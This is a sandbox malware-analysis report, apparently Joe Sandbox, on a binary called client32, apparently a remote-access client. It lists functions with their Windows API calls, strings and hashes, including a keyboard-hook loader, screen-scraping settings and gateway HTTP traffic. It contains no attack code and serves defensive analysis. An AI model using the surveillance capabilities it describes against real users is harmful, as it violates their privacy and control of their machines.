Instruction Fuzzy Hash: 06E175B2E4012C6ACB24EB64CC90FEF77789F49205F4045D9E54967A41DB35AF888FA3

Function 1113F910 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,762323A0), ref: 1113F943
LoadLibraryA.KERNEL32(?), ref: 1113F98C
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113F9A5
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113F9B4
GetModuleHandleA.KERNEL32(?), ref: 1113F9BA
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113F9CE
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113F9ED
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113F9F8
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FA03
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FA0E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FA19
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FA24
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FA2F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FA3A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FA45
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FA50
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FA5B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FA66
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FA71
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FA7C

Part of subcall function 11080C50: _strrchr.LIBCMT ref: 11080C5E

Strings

MiniDumpWriteDump, xrefs: 1113FA73
SymGetLineNext, xrefs: 1113F9EF
SymSetOptions, xrefs: 1113FA47
SymGetOptions, xrefs: 1113FA3C
IMAGEHLP.DLL, xrefs: 1113F9AE, 1113F9B3, 1113F9B9
SymLoadModule, xrefs: 1113FA26
DBGHELP.DLL, xrefs: 1113F99F, 1113F9A4
StackWalk, xrefs: 1113FA13
SymGetLinePrev, xrefs: 1113F9FA
SymCleanup, xrefs: 1113FA1B
SymGetLineFromName, xrefs: 1113F9E7
SymGetModuleInfo, xrefs: 1113FA52
SymInitialize, xrefs: 1113FA31
SymMatchFileName, xrefs: 1113FA05
dbghelp.dll, xrefs: 1113F968
SymFunctionTableAccess, xrefs: 1113FA68
SymGetLineFromAddr, xrefs: 1113F9C8
SymGetSymFromAddr, xrefs: 1113FA5D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 0d80334d7c54e61a641bd670e0b6889b788af16b3c4035bc4294169387cf03f4
Instruction ID: 03bc80c6e1c07a71d5d8a66c4dad401031422a7b888a3ea25cbafadc1b364b9a
Opcode Fuzzy Hash: 0d80334d7c54e61a641bd670e0b6889b788af16b3c4035bc4294169387cf03f4
Instruction Fuzzy Hash: 59415270A00B05AFE7209F7A8C84A6BF7F8FF59754B04492EE485D3690E774E8408B5D

Function 110A8D50 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(setupapi.dll,33E68B52,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11180D08), ref: 110A8D83
GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A8DA7
SetupDiGetClassDevsA.SETUPAPI(111A2B7C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11180D08,000000FF), ref: 110A8DC1
GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A8DEC
_free.LIBCMT ref: 110A8E20
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A8E32
GetLastError.KERNEL32 ref: 110A8E5D
_malloc.LIBCMT ref: 110A8E73
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A8E95
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11180D08,000000FF,?,1102EB51,Client), ref: 110A8EC7
SetLastError.KERNEL32(00000078), ref: 110A8EDB
GetLastError.KERNEL32 ref: 110A8EE1
_free.LIBCMT ref: 110A8EF3
SetLastError.KERNEL32(00000078), ref: 110A8F04
SetLastError.KERNEL32(00000078), ref: 110A8F11
_free.LIBCMT ref: 110A8F24
FreeLibrary.KERNEL32(?,?), ref: 110A8F34
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11180D08,000000FF,?,1102EB51,Client), ref: 110A8FD8

Strings

SetupDiDestroyDeviceInfoList, xrefs: 110A8F80
SetupDiGetDeviceInterfaceDetailA, xrefs: 110A8E2C, 110A8E8F
SetupDiEnumDeviceInterfaces, xrefs: 110A8DE6
setupapi.dll, xrefs: 110A8D7B
SetupDiGetClassDevsA, xrefs: 110A8D9B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
API String ID: 3464732724-3340099623
Opcode ID: 069873096ddd9361f6eeb4902aec842f7b46e49037b89b8f0a59924a4b05439d
Instruction ID: 13ce22c0bc51d0122121316869039189ab66259e4c26e708d49ea6b208d95f03
Opcode Fuzzy Hash: 069873096ddd9361f6eeb4902aec842f7b46e49037b89b8f0a59924a4b05439d
Instruction Fuzzy Hash: FA8173B5D00216ABD701DFE4EC88F9EFBB9EF45705F10452AFA11E6284EB349A05CB61

Function 1113D810 Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 266
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113D8A4
SetLastError.KERNEL32(00000078), ref: 1113D8B3
FreeLibrary.KERNEL32(00000000), ref: 1113D8C5
LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113D904
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113D969
_memset.LIBCMT ref: 1113D97D
LoadCursorA.USER32(00000000,00007F00), ref: 1113D9CF
GetStockObject.GDI32(00000000), ref: 1113D9DA
LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DA92
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DAA7
RegisterClassExA.USER32(?), ref: 1113D9F5

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

SetTimer.USER32(00000000,00000000,000003E8,11139580), ref: 1113DBD4
#17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DC09
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DC14

Part of subcall function 11015E40: LoadLibraryA.KERNEL32(User32.dll,?,1111FB09,?), ref: 11015E48

Strings

HookKeyboard, xrefs: 1113DAA1
InitUI (%d), xrefs: 1113D83B
View, xrefs: 1113DADE
*DisableDPIAware, xrefs: 1113D865
NSMWClass, xrefs: 1113D95B, 1113D9EE
SetProcessDPIAware, xrefs: 1113D89E
*quiet, xrefs: 1113D931
pcihooks, xrefs: 1113DA8D
UI.CPP, xrefs: 1113D9A6, 1113DA07
NSMGetAppIcon(), xrefs: 1113D9AB
_License, xrefs: 1113D936
_debug, xrefs: 1113DB00
Client, xrefs: 1113D86A
TraceCopyData, xrefs: 1113DAFB
riched32.dll, xrefs: 1113DC0F
imm32, xrefs: 1113D8FA

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 2794364348-3534351892
Opcode ID: 09a08d277847ffa6f5755aa960ec911928ed0521d9354b799889aa03ad8b97a1
Instruction ID: bd2c2121c20740d49df012e20f12643f76ddf7931093b471b6ff1ffd869ac82c
Opcode Fuzzy Hash: 09a08d277847ffa6f5755aa960ec911928ed0521d9354b799889aa03ad8b97a1
Instruction Fuzzy Hash: 77B1C674E112169FEB02DFE1CD84B6DFBB0BB4471EF904139E925A6288EB746044CB66

Function 11130E10 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,33E68B52), ref: 11130E7E
LoadLibraryA.KERNEL32(psapi.dll), ref: 11130ED6
GetCurrentProcess.KERNEL32 ref: 11130F17
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11130F41
GetProcessHandleCount.KERNEL32(00000000,?), ref: 11130F52
SetLastError.KERNEL32(00000078), ref: 11130F58
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11130F74
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11130F9C
SetLastError.KERNEL32(00000078), ref: 11130FB9
SetLastError.KERNEL32(00000078), ref: 11130FC6
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11130FD8
K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11130FEB
SetLastError.KERNEL32(00000078), ref: 11130FF1
FreeLibrary.KERNEL32(?), ref: 1113115B
FreeLibrary.KERNEL32(?), ref: 11131168
FreeLibrary.KERNEL32(?), ref: 11131172

Strings

RestartMB, xrefs: 111310AC
RestartHandles, xrefs: 111310D7
psapi.dll, xrefs: 11130EB3
Date=%04d-%02d-%02d, xrefs: 11130E9B
RestartGdiObj, xrefs: 111310FE
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11131063
GetGuiResources, xrefs: 11130F6E, 11130F96
GetProcessMemoryInfo, xrefs: 11130FD2
_debug, xrefs: 11130E62
Client, xrefs: 111310B1, 111310DC, 11131103, 1113112A
CheckLeaks, xrefs: 11130E5D
RestartUserObj, xrefs: 11131125
GetProcessHandleCount, xrefs: 11130F3B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
API String ID: 263027137-1001504656
Opcode ID: 284eb801fc06e75a0f3754faa4dbd14551c108b4321c639136860bd57e05090e
Instruction ID: 9a00bb499110d2507d68bbd57016205f0caf96ad2e35cba7fb85b81e670cb123
Opcode Fuzzy Hash: 284eb801fc06e75a0f3754faa4dbd14551c108b4321c639136860bd57e05090e
Instruction Fuzzy Hash: 05B18970E012699FDB51CFE9CDC0AEDFBB9AB88319F10846AE515E7248DB305884CB61

Function 1102D629 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102D991

Strings

Wtsapi32.dll, xrefs: 1102D98C
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE4A
WTSQuerySessionInformationA, xrefs: 1102D9FE
client32.ini, xrefs: 1102D7B5
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DE70
MacAddress, xrefs: 1102DA8F
DisableConsoleClient, xrefs: 1102D8C7
TCPIP, xrefs: 1102D965
11/09/15 09:21:05 V12.10F2, xrefs: 1102DE1E
ListenPort, xrefs: 1102D960
screenscrape, xrefs: 1102D978
ts macaddr=%s, xrefs: 1102DA7C
client32 dbi %hs, xrefs: 1102DE23
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DA54
, xrefs: 1102DB15
Error x%x reading %s, sesh=%d, xrefs: 1102D811
Client, xrefs: 1102D945, 1102D97D, 1102DA94
WTSFreeMemory, xrefs: 1102DAC1
124406, xrefs: 1102DBA5, 1102DDCC, 1102DE41
ClientName, xrefs: 1102DB45
TSMode, xrefs: 1102D940

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $11/09/15 09:21:05 V12.10F2$124406$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-1179772846
Opcode ID: 42281f03be36c908e0d7a1648a59ebf2105338534a03dbaf0b39e33b327d3637
Instruction ID: 796cb7f010a0373e31feaea9f031654b84a4af0a9789c07af2b2af8e0f0cd310
Opcode Fuzzy Hash: 42281f03be36c908e0d7a1648a59ebf2105338534a03dbaf0b39e33b327d3637
Instruction Fuzzy Hash: 8BC1C475D0026A9FDB12DF958C90BEDF7B9BB44308F9440EDE959A7240D7706E80CB61

Function 6C3C98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 6C3C996F
_strncmp.LIBCMT ref: 6C3C99A5

Strings

abort send, gateway hungup, xrefs: 6C3C9D2E
%02x %02x, xrefs: 6C3C9AE7
Error %d writing inet request on connection %d, xrefs: 6C3C9BE3
NC_DATA, xrefs: 6C3C9969
Error %d sending HTTP request on connection %d, xrefs: 6C3C9D1F
%s, xrefs: 6C3C9AAA
SendHttpReq failed, not connected to gateway!, xrefs: 6C3C9934, 6C3C9B79
Error send returned 0 on connection %d, xrefs: 6C3C9CF8
xx %02x, xrefs: 6C3C9AFB
CMD=NC_DATA, xrefs: 6C3C999F
3', xrefs: 6C3C9CB2

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: fc73eccbb060ca1a1010928105803e3d29acbe11688772c5eb123c854e0a3756
Instruction ID: a2930f7a0f680203fce880d3932246ce540e1f1bb4a954412d8bc908347dcab5
Opcode Fuzzy Hash: fc73eccbb060ca1a1010928105803e3d29acbe11688772c5eb123c854e0a3756
Instruction Fuzzy Hash: 63D1AC75B052199FDB20DF64C884BDEB7B4AF0A30CF054199D8499B642DB329E89CF93

Function 11028260 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C6C1370,?,0000001A), ref: 1102834D
_strrchr.LIBCMT ref: 1102835C

Part of subcall function 11160D5E: __stricmp_l.LIBCMT ref: 11160D9B

Strings

NSMAppDataDir, xrefs: 11028665
SupportWWW, xrefs: 11028605
AssistantURL, xrefs: 11028729
ShortName, xrefs: 11028515
NSSLongCaption, xrefs: 110287C5
NSSTLA, xrefs: 110285D5
SupportsAndroid, xrefs: 110287F2
??I, xrefs: 11028967
Name, xrefs: 110284AE
NSSName, xrefs: 110285A5
TechConsole, xrefs: 1102878D
NSSAppDataDir, xrefs: 11028695
product.dat, xrefs: 11028310, 11028361
LongName, xrefs: 110284E5
NSSConfName, xrefs: 110286C5
Home, xrefs: 11028545
SupportsChrome, xrefs: 11028756
??F, xrefs: 110288E0
AssistantName, xrefs: 110286FC
SupportEMail, xrefs: 11028635
\, xrefs: 110282DC
TLA, xrefs: 11028575

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: ddd328237dc0b90594aa32461407e5cfae32179008d883e2a7a3c4231abb1cc9
Instruction ID: 3bd81b9da5908e085a469b2853bb5f52d244aee14bcfc1b6e6f29bc019c18c33
Opcode Fuzzy Hash: ddd328237dc0b90594aa32461407e5cfae32179008d883e2a7a3c4231abb1cc9
Instruction Fuzzy Hash: E112F73CD052A68BDB46CF24C8847D8F7F4AB1930DF4440EAECD957205EB72A686CB91

Function 6C3D6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 6C3D6BD5
GetTickCount.KERNEL32 ref: 6C3D6C26
Sleep.KERNEL32(00000064), ref: 6C3D6C5B

Part of subcall function 6C3D6940: GetTickCount.KERNEL32 ref: 6C3D6950

WaitForSingleObject.KERNEL32(00000300,?), ref: 6C3D6C7C
_memmove.LIBCMT ref: 6C3D6C93
select.WSOCK32(00000001,?,00000000,00000000,?), ref: 6C3D6CB4
Sleep.KERNEL32(00000032,00000001,?,00000000,00000000,?), ref: 6C3D6CD9
GetTickCount.KERNEL32 ref: 6C3D6CEC
_calloc.LIBCMT ref: 6C3D6D76
GetTickCount.KERNEL32 ref: 6C3D6DF3
InterlockedExchange.KERNEL32(02CE2C92,00000000), ref: 6C3D6E01
_calloc.LIBCMT ref: 6C3D6E33
_memmove.LIBCMT ref: 6C3D6E47
InterlockedDecrement.KERNEL32(02CE2C3A), ref: 6C3D6EC3
SetEvent.KERNEL32(00000304), ref: 6C3D6ECF
_memmove.LIBCMT ref: 6C3D6EF4
GetTickCount.KERNEL32 ref: 6C3D6F4F
InterlockedExchange.KERNEL32(02CE2BDA,-6C40A188), ref: 6C3D6F60

Strings

httprecv, xrefs: 6C3D6BDD
ReadMessage returned FALSE. Terminating connection, xrefs: 6C3D6F3A
